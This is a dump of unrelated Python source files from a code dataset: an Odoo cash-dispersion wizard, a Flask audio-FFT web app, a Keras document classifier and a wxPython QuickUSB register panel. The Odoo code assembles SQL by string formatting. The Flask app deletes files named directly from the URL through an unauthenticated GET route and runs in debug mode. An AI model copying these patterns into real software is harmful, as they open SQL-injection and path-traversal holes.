DATE),recepcion.boxtype_id,\n sum(coalesce(detalle.total_entry_encoding,0))importetransacciones,\n sum(coalesce(detalle.balance_end_real,0)-coalesce(detalle.balance_start,0))importereal\n ,metodo.id\n from cb_session recepcion\n join account_bank_statement detalle on recepcion.id=detalle.cb_session_id\n join account_journal metodo on detalle.journal_id=metodo.id\n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)='%s' \n and recepcion.boxtype_id='%s' \n and coalesce(recepcion.incluidodispersion,'f') <> 't' \n and recepcion.state='closed' \n and recepcion.start_at is not null\n and coalesce(metodo.transfer_required,'f')='f'\n group by cast(recepcion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),recepcion.boxtype_id,metodo.id\n '''%(fecha,agrupacioncaja))\n record=self.env.cr.fetchall()\n importetransacciones=0\n importereal=0\n metodo=False\n count=0\n for i in record:\n importetransacciones=i[2]\n importereal=i[3]\n metodo=i[4]\n count=count+1\n\n if count >1:\n raise ValidationError ('''\n Existe mas de un metodo de pago configurado como no requiere transferencia.\n\n -Solo el Efectivo debe estar configurado como no requiere transferencia.\n -Revisar Configuración de metodos de pago.\n '''%())\n\n return {\n 'importetransacciones': importetransacciones,\n 'importereal':importereal,\n 'metodopago': metodo,\n }\n\n\n\nclass cls_wizardmotivocancelaciondispersion(models.TransientModel):\n \"\"\"\n Account move reversal wizard, it cancel an account move by reversing it.\n \"\"\"\n _name = 'motivo.cancelacion'\n\n motivo = fields.Char(string='Motivo de cancelacion', required=True)\n\n @api.multi\n def registra_motivocancelacion(self):\n dispersion_id = self._context.get('active_ids', False)\n for dis in dispersion_id:\n dispersion=self.env['dispersionbancaria'].search([('id','=',dis)])\n\n if dispersion.incluidotransferencia:\n raise ValidationError('Esta dispersión,ya esta incluida en una transferencia bancaria. Para cancelar la dispersión, cancelar primero la Transferencia')\n\n if dispersion.state=='cancel':\n raise ValidationError('Alguna Dispersión ya esta cancelada')\n dispersion.write({'state': 'pcancel','estatusanterior':dispersion.state})\n\n motivocancelacion={}\n motivocancelacion={\n 'dispersion_id':dispersion.id,\n 'motivo':'Cancelacion: '+str(self.motivo)\n }\n self.env['motivo.cancelaciondispersion'].create(motivocancelacion)\n\n @api.multi\n def registra_rechazomotivocancelacion(self):\n dispersion_id = self._context.get('active_ids', False)\n for dis in dispersion_id:\n dispersion=self.env['dispersionbancaria'].search([('id','=',dis)])\n if dispersion.state!='pcancel':\n raise ValidationError('Algunas Dispersiones no se puede rechazar debido a que no estan en pendiente de cancelación')\n\n #count=self.env['account.move'].search_count([('dispersion_id', '=', dispersion.id)])\n #if count==0:\n # dispersion.write({'state': 'draft'})\n #else:\n # dispersion.write({'state': 'done'})\n dispersion.write({'state': dispersion.estatusanterior})\n motivocancelacion={}\n motivocancelacion={\n 'dispersion_id':dispersion.id,\n 'motivo':'Rechazo: '+str(self.motivo)\n }\n self.env['motivo.cancelaciondispersion'].create(motivocancelacion)\n\n","sub_path":"extrasGDL/cajas_municipal/wizard/wizard_dispersion_v3.py","file_name":"wizard_dispersion_v3.py","file_ext":"py","file_size_in_byte":69624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"426337613","text":"#Code-\n\ndef function(s):\n if s.endswith('o'):\n print(\"FILIPINO\")\n elif s.endswith('u'):\n print(\"JAPANESE\")\n else:\n print(\"KOREAN\")\n \n \nm= int(input())\ni=0\nwhile i', methods=['GET'])\ndef getMusic(filename):\n if request.method == 'GET':\n # return config.UPLOAD_FOLDER\n return send_from_directory(directory=config.UPLOAD_FOLDER, filename=filename)\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\ndef transformFileName(filename):\n # input.mp3 = input_mp3.csv\n return \"_\".join(filename.split('.')) + '.csv'\n\n\n@app.route('/fft', methods=['GET'])\ndef calculate():\n if request.method == 'GET':\n # do validation on input\n fin = request.args.get('in')\n fout = transformFileName(fin)\n\n if fft.run(fin, fout):\n return redirect('/')\n else:\n return redirect('/')\n\n\n@app.route('/chart', methods=['GET'])\ndef chart():\n if request.method == 'GET':\n x, y, z = fft.read(request.args.get('in'))\n return json.dumps({'x': x, 'y': y, 'z': z})\n\n\n@app.route('/delete/', methods=['GET'])\ndef delete(filename):\n if request.method == 'GET':\n os.remove(config.UPLOAD_FOLDER+\"/\"+filename)\n os.remove(config.OUTPUT_FOLDER+\"/\"+transformFileName(filename))\n return json.dumps({'removed': filename})\n\n\nif __name__ == '__main__':\n app.run(debug=True, threaded=True)\n","sub_path":"musicfft.py","file_name":"musicfft.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"421572478","text":"from keras.models import load_model\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.sequence import pad_sequences\nimport numpy as np\nimport json\n\nclass Classifier():\n\n classes = {0:'CDI', 1:'CNH', 2:'C_NASCIMENTO', 3:'PASSAPORTE', 4:'RG', 5:'TITULO_ELEITORIAL'}\n \n def __init__(self, path):\n data_config = json.load(open(\"../charcnn_data_config.json\", encoding=\"utf8\"))\n \n self.alphabet_size = data_config[\"data\"][\"alphabet_size\"]\n self.length = data_config[\"data\"][\"input_size\"]\n self.model = load_model(path)\n self.model._make_predict_function()\n self.alphabet = \" abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:'\\\"/\\\\|_@#$%^&*~`+-=<>()[]{}\"\n self.dict = {} # Maps each character to an integer\n self.no_of_classes = 6\n for idx, char in enumerate(self.alphabet):\n self.dict[char] = idx + 1\n \n def predict(self, text_source, image_source):\n formatted_image = self.get_image_array(image_source)\n formatted_text = self.get_text_3dim(text_source)\n prediction = self.model.predict([formatted_text, formatted_image])\n prediction_index = np.where(prediction[0] == np.amax(prediction[0]))\n return self.classes[prediction_index[0][0]] \n\n def vectorize_sentences(self, data, char_indices):\n X = []\n\n for doc in data:\n \n x = [char_indices[w] if w in self.alphabet else 0 for w in doc.lower()]\n x2 = np.eye(self.alphabet_size + 1)[x]\n X.append(x2)\n \n return pad_sequences(X, maxlen=self.length, padding=\"pre\")\n\n def get_text_3dim(self, text_source):\n data = []\n \n data.append(text_source)\n self.data = np.array(data)\n\n char_indices = dict((c, i) for i, c in enumerate(self.alphabet,1))\n indices_char = dict((i, c) for i, c in enumerate(self.alphabet,1))\n\n \n formatted_text = self.vectorize_sentences(self.data, char_indices)\n return formatted_text\n\n def get_image_array(self, image_path):\n img = load_img(image_path, target_size=(150,150), color_mode='grayscale')\n img_array = img_to_array(img)\n img_data = np.array([img_array])\n return img_data","sub_path":"api/src/api/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651402756","text":"#Boa:FramePanel:panelSettings\n\"\"\"\n============================================================================\n Title : panelSettings.py\n Description : QuickUSB Python API Interface\n Notes : \n History :\n\n Copyright (c) 2020 Bitwise Systems, Inc.\n\n Permission is hereby granted, free of charge, to any person obtaining \n a copy of this software and associated documentation files (the \"Software\"), \n to deal in the Software without restriction, including without limitation \n the rights to use, copy, modify, merge, publish, distribute, sublicense, \n and/or sell copies of the Software, and to permit persons to whom the \n Software is furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included \n in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS \n OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL \n THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS \n IN THE SOFTWARE.\n\n============================================================================\n\"\"\"\n\n# wx imports\nimport wx\n\n#Python imports\nimport time\n\n# Bitwise Systems imports\nfrom QuickUsb import *\nfrom BitTwiddler import *\n\n# Generated Boa Constructor wx IDs\n[wxID_PANELSETTINGS, wxID_PANELSETTINGSBTSCPUCONFIGH, \n wxID_PANELSETTINGSBTSCPUCONFIGL, wxID_PANELSETTINGSBTSDATAADDRESSH, \n wxID_PANELSETTINGSBTSDATAADDRESSL, wxID_PANELSETTINGSBTSEP26CONFIGH, \n wxID_PANELSETTINGSBTSEP26CONFIGL, wxID_PANELSETTINGSBTSFIFOCONFIGH, \n wxID_PANELSETTINGSBTSFIFOCONFIGL, wxID_PANELSETTINGSBTSFPGATYPEH, \n wxID_PANELSETTINGSBTSFPGATYPEL, wxID_PANELSETTINGSBTSI2CTLH, \n wxID_PANELSETTINGSBTSI2CTLL, wxID_PANELSETTINGSBTSPINFLAGSH, \n wxID_PANELSETTINGSBTSPINFLAGSL, wxID_PANELSETTINGSBTSPORTACCFGH, \n wxID_PANELSETTINGSBTSPORTACCFGL, wxID_PANELSETTINGSBTSPORTAH, \n wxID_PANELSETTINGSBTSPORTAL, wxID_PANELSETTINGSBTSPORTBH, \n wxID_PANELSETTINGSBTSPORTBL, wxID_PANELSETTINGSBTSPORTCH, \n wxID_PANELSETTINGSBTSPORTCL, wxID_PANELSETTINGSBTSPORTDH, \n wxID_PANELSETTINGSBTSPORTDL, wxID_PANELSETTINGSBTSPORTEH, \n wxID_PANELSETTINGSBTSPORTEL, wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH, \n wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL, wxID_PANELSETTINGSBTSSPICONFIGH, \n wxID_PANELSETTINGSBTSSPICONFIGL, wxID_PANELSETTINGSBTSVERSIONBUILDH, \n wxID_PANELSETTINGSBTSVERSIONBUILDL, wxID_PANELSETTINGSBTSVERSIONSPEEDH, \n wxID_PANELSETTINGSBTSVERSIONSPEEDL, wxID_PANELSETTINGSBTSWORDWIDEH, \n wxID_PANELSETTINGSBTSWORDWIDEL, wxID_PANELSETTINGSPSETTINGS, \n wxID_PANELSETTINGSSBSETTINGS, \n] = [wx.NewId() for _init_ctrls in range(39)]\n\nclass panelSettings(wx.Panel):\n def _init_coll_szsbSettings_Items(self, parent):\n # generated method, don't edit\n\n parent.AddWindow(self.pSettings, 0, border=0, flag=wx.GROW)\n\n def _init_coll_bszSettingsMain_Items(self, parent):\n # generated method, don't edit\n\n parent.AddSizer(self.szsbSettings, 0, border=0, flag=wx.GROW)\n\n def _init_coll_szbSettings_Items(self, parent):\n # generated method, don't edit\n\n parent.AddSizer(self.szgSettings, 1, border=4, flag=wx.GROW | wx.ALL)\n\n def _init_coll_szgSettings_Items(self, parent):\n # generated method, don't edit\n\n parent.AddWindow(self.btsEP26CONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsEP26CONFIGL, 0, border=0, flag=0)\n parent.AddWindow(self.btsWORDWIDEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsWORDWIDEL, 0, border=0, flag=0)\n parent.AddWindow(self.btsDATAADDRESSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsDATAADDRESSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsFIFOCONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsFIFOCONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsFPGATYPEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsFPGATYPEL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsCPUCONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsCPUCONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsSPICONFIGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsSPICONFIGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsSLAVEFIFOFLAGSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsSLAVEFIFOFLAGSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsI2CTLH, 0, border=0, flag=0)\n parent.AddWindow(self.btsI2CTLL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTAH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTAL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTBH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTBL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTCH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTCL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTDL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTEH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTEL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPORTACCFGH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPORTACCFGL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsPINFLAGSH, 0, border=0, flag=0)\n parent.AddWindow(self.btsPINFLAGSL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsVERSIONBUILDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsVERSIONBUILDL, 0, border=0,\n flag=0)\n parent.AddWindow(self.btsVERSIONSPEEDH, 0, border=0, flag=0)\n parent.AddWindow(self.btsVERSIONSPEEDL, 0, border=0,\n flag=0)\n\n def _init_sizers(self):\n # generated method, don't edit\n self.bszSettingsMain = wx.BoxSizer(orient=wx.VERTICAL)\n\n self.szbSettings = wx.BoxSizer(orient=wx.HORIZONTAL)\n\n self.szsbSettings = wx.StaticBoxSizer(box=self.sbSettings,\n orient=wx.HORIZONTAL)\n\n self.szgSettings = wx.GridSizer(cols=2, hgap=16, rows=18, vgap=2)\n\n self._init_coll_bszSettingsMain_Items(self.bszSettingsMain)\n self._init_coll_szbSettings_Items(self.szbSettings)\n self._init_coll_szsbSettings_Items(self.szsbSettings)\n self._init_coll_szgSettings_Items(self.szgSettings)\n\n self.SetSizer(self.bszSettingsMain)\n self.pSettings.SetSizer(self.szbSettings)\n\n def _init_ctrls(self, prnt):\n # generated method, don't edit\n wx.Panel.__init__(self, id=wxID_PANELSETTINGS, name='panelSettings',\n parent=prnt, pos=wx.Point(654, 293), size=wx.Size(591, 407),\n style=wx.TAB_TRAVERSAL)\n self.SetClientSize(wx.Size(575, 369))\n\n self.sbSettings = wx.StaticBox(id=wxID_PANELSETTINGSSBSETTINGS,\n label='Settings', name='sbSettings', parent=self, pos=wx.Point(0,\n 0), size=wx.Size(575, 388), style=0)\n\n self.pSettings = wx.Panel(id=wxID_PANELSETTINGSPSETTINGS,\n name='pSettings', parent=self, pos=wx.Point(5, 17),\n size=wx.Size(512, 366), style=wx.TAB_TRAVERSAL)\n\n self.btsPORTDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTDL, label='IOD', name='btsPORTDL',\n parent=self.pSettings, pos=wx.Point(264, 244), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=12,\n tooltips=['Bit 0: PD[0] Value', 'Bit 1: PD[1] Value',\n 'Bit 2: PD[2] Value', 'Bit 3: PD[3] Value', 'Bit 4: PD[4] Value',\n 'Bit 5: PD[5] Value', 'Bit 6: PD[6] Value', 'Bit 7: PD[7] Value'],\n value=0)\n self.btsPORTDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTDL)\n\n self.btsPORTDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTDH, label='OED', name='btsPORTDH',\n parent=self.pSettings, pos=wx.Point(4, 244), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=12,\n tooltips=['Bit 0: PD[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PD[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PD[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PD[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PD[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PD[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PD[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PD[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTDH)\n\n self.btsWORDWIDEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSWORDWIDEH, label='WORDWIDE',\n name='btsWORDWIDEH', parent=self.pSettings, pos=wx.Point(4, 24),\n showlabel=True, size=wx.Size(227, 18), style=wx.NO_BORDER,\n tagint=1, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsWORDWIDEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSWORDWIDEH)\n\n self.btsWORDWIDEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSWORDWIDEL, label='WORDWIDE',\n name='btsWORDWIDEL', parent=self.pSettings, pos=wx.Point(281, 24),\n showlabel=True, size=wx.Size(227, 18), style=wx.NO_BORDER,\n tagint=1,\n tooltips=['Bit 0: WORDWIDE Data Width\\n 0 - 8-bits\\n 1 - 16-bits',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: Reserved'], value=0)\n self.btsWORDWIDEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSWORDWIDEL)\n\n self.btsPINFLAGSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPINFLAGSL, label='PINFLAGSCD',\n name='btsPINFLAGSL', parent=self.pSettings, pos=wx.Point(264,\n 304), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=15, tooltips=['Bit 0: FLAGC[0]', 'Bit 1: FLAGC[1]',\n 'Bit 2: FLAGC[2]', 'Bit 3: FLAGC[3]', 'Bit 4: FLAGD[0]',\n 'Bit 5: FLAGD[1]', 'Bit 6: FLAGD[2]', 'Bit 7: FLAGD[3]'],\n value=0)\n self.btsPINFLAGSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPINFLAGSL)\n\n self.btsPINFLAGSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPINFLAGSH, label='PINFLAGSAB',\n name='btsPINFLAGSH', parent=self.pSettings, pos=wx.Point(4, 304),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=15, tooltips=['Bit 0: FLAGA[0]', 'Bit 1: FLAGA[1]',\n 'Bit 2: FLAGA[2]', 'Bit 3: FLAGA[3]', 'Bit 4: FLAGB[0]',\n 'Bit 5: FLAGB[1]', 'Bit 6: FLAGB[2]', 'Bit 7: FLAGB[3]'],\n value=0)\n self.btsPINFLAGSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPINFLAGSH)\n\n self.btsSPICONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSPICONFIGH, label='PORTECFG',\n name='btsSPICONFIGH', parent=self.pSettings, pos=wx.Point(4, 124),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=6, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: GPIFA[8] - Enable GPIF Address Pins\\n 0 - Configure PE[7] as GPIO\\n 1 - Configure PE[7] as GPIFADR[8] output'],\n value=0)\n self.btsSPICONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSPICONFIGH)\n\n self.btsSPICONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSPICONFIGL, label='SPICONFIG',\n name='btsSPICONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 124), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=6,\n tooltips=['Bit 0: SPIENDIAN - SPI Bit Endianness\\n 0 - LSBit to MSBit\\n 1 - MSBit to LSBit',\n 'Bit 1: SPICPOL - SPI Clock Polarity\\n 0 - Normal\\n 1 - Inverted',\n 'Bit 2: SPICPHA - SPI Clock Phase\\n 0 - Sample Then Clock\\n 1 - Clock Then Sample',\n 'Bit 3: SPIPORT - Select Port for SPI/FPGA communication\\n 0 - Use Port E\\n 1 - Use Port A',\n 'Bit 4: NCEPIN - Select the pin for the nCE line\\n 0 - nCE is on pin 2 of SPIPORT\\n 1 - nCE is on pin 7 of SPIPORT',\n 'Bit 5: MISOPIN - Select the port for the MISO line\\n 0 - MISO is on pin 5 of SPIPORT\\n 1 - MISO is on pin 2 of SPIPORT',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsSPICONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSPICONFIGL)\n\n self.btsSLAVEFIFOFLAGSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH, label='SlaveFIFO',\n name='btsSLAVEFIFOFLAGSH', parent=self.pSettings, pos=wx.Point(4,\n 144), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=7, tooltips=['Bit 0: EP6 Full Flag',\n 'Bit 1: EP6 Empty Flag', 'Bit 2: Reserved',\n 'Bit 3: RDY[0] - Pin Status', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsSLAVEFIFOFLAGSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSH)\n\n self.btsSLAVEFIFOFLAGSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL, label='SlaveFIFO',\n name='btsSLAVEFIFOFLAGSL', parent=self.pSettings,\n pos=wx.Point(264, 144), showlabel=True, size=wx.Size(244, 18),\n style=wx.NO_BORDER, tagint=7, tooltips=['Bit 0: EP2 Full Flag',\n 'Bit 1: EP2 Empty Flag', 'Bit 2: Reserved',\n 'Bit 3: RDY[1] Pin Status', 'Bit 4: Reserved', 'Bit 5: Reserved',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsSLAVEFIFOFLAGSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSSLAVEFIFOFLAGSL)\n\n self.btsCPUCONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSCPUCONFIGL, label='CPUCONFIG',\n name='btsCPUCONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 104), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=5, tooltips=['Bit 0: Reserved',\n 'Bit 1: CLKOE - CLKOUT Output Enable\\n 0 - Tri-state the CLKOUT Pin\\n 1 - Drive the CLKOUT Pin',\n 'Bit 2: CLKINV - Invert CLKOUT Pin\\n 0 - Nomal\\n 1 - Invert',\n 'Bit 3: CLKSPD[0] - CPU Clock Speed\\n 00 - 12 MHz\\n 01 - 24 MHz\\n 10 - 48 MHz\\n 11=Reserved',\n 'Bit 4: CLKSPD[1] - CPU Clock Speed\\n 00 - 12 MHz\\n 01 - 24 MHz\\n 10 - 48 MHz\\n 11=Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsCPUCONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSCPUCONFIGL)\n\n self.btsCPUCONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSCPUCONFIGH, label='BusSpeed',\n name='btsCPUCONFIGH', parent=self.pSettings, pos=wx.Point(4, 104),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=5, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: USB Bus Speed\\n 0 - Force Full-Speed (12 Mbps)\\n 1 - Allow High-Speed (480 Mbps)'],\n value=0)\n self.btsCPUCONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSCPUCONFIGH)\n\n self.btsPORTACCFGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTACCFGH, label='PORTACFG',\n name='btsPORTACCFGH', parent=self.pSettings, pos=wx.Point(4, 284),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=14,\n tooltips=['Bit 0: INT0 - Interrupt 0 Alternate Configuration\\n 0 - PA[0] not configured as interrupt\\n 1 - PA[0] configured as interrupt input\\nNOTE: INT0 is currently not used',\n 'Bit 1: INT1 - Interrupt 1 Alternate Configuration\\n 0 - PA[1] not configured as interrupt\\n 1 - PA[1] configured as interrupt input\\nNOTE: INT1 is currently not used',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved',\n 'Bit 6: SLCS - Slave FIFO Chip Select Alternate Configuration\\n 0 - PA[7] not configured as SLCS input in Slave Mode\\n 1 - PA[7] confiured as SLCS input in Slave Mode\\nNote: If both bit 15 (FLAGD) and bit 14 (SLCS) are set,\\nPA[7] will be configured to give the FLAGD status',\n 'Bit 7: FLAGD - Flag D Alternate Configuration\\n 0 - PA[7] does not give FLAGD status in Slave Mode\\n 1 - PA[7] gives FLAGD status when in Slave Mode\\nNote: If both bit 15 (FLAGD) and bit 14 (SLCS) are set,\\nPA[7] will be configured to give the FLAGD status'],\n value=0)\n self.btsPORTACCFGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTACCFGH)\n\n self.btsPORTACCFGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTACCFGL, label='PORTCCFG',\n name='btsPORTACCFGL', parent=self.pSettings, pos=wx.Point(264,\n 284), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=14,\n tooltips=['Bit 0: GPIFA[0] - Enable GPIF Address Pins\\n 0 - Configure PC[0] as GPIO\\n 1 - Configure PC[0] as GPIFADR[7] output',\n 'Bit 1: GPIFA[1] - Enable GPIF Address Pins\\n 0 - Configure PC[1] as GPIO\\n 1 - Configure PC[1] as GPIFADR[7] output',\n 'Bit 2: GPIFA[2] - Enable GPIF Address Pins\\n 0 - Configure PC[2] as GPIO\\n 1 - Configure PC[2] as GPIFADR[7] output',\n 'Bit 3: GPIFA[3] - Enable GPIF Address Pins\\n 0 - Configure PC[3] as GPIO\\n 1 - Configure PC[3] as GPIFADR[7] output',\n 'Bit 4: GPIFA[4] - Enable GPIF Address Pins\\n 0 - Configure PC[4] as GPIO\\n 1 - Configure PC[4] as GPIFADR[7] output',\n 'Bit 5: GPIFA[5] - Enable GPIF Address Pins\\n 0 - Configure PC[5] as GPIO\\n 1 - Configure PC[5] as GPIFADR[7] output',\n 'Bit 6: GPIFA[6] - Enable GPIF Address Pins\\n 0 - Configure PC[6] as GPIO\\n 1 - Configure PC[6] as GPIFADR[7] output',\n 'Bit 7: GPIFA[7] - Enable GPIF Address Pins\\n 0 - Configure PC[7] as GPIO\\n 1 - Configure PC[7] as GPIFADR[7] output'],\n value=0)\n self.btsPORTACCFGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTACCFGL)\n\n self.btsPORTAH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTAH, label='OEA', name='btsPORTAH',\n parent=self.pSettings, pos=wx.Point(4, 184), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=9,\n tooltips=['Bit 0: PA[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PA[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PA[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PA[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PA[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PA[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PA[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PA[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n 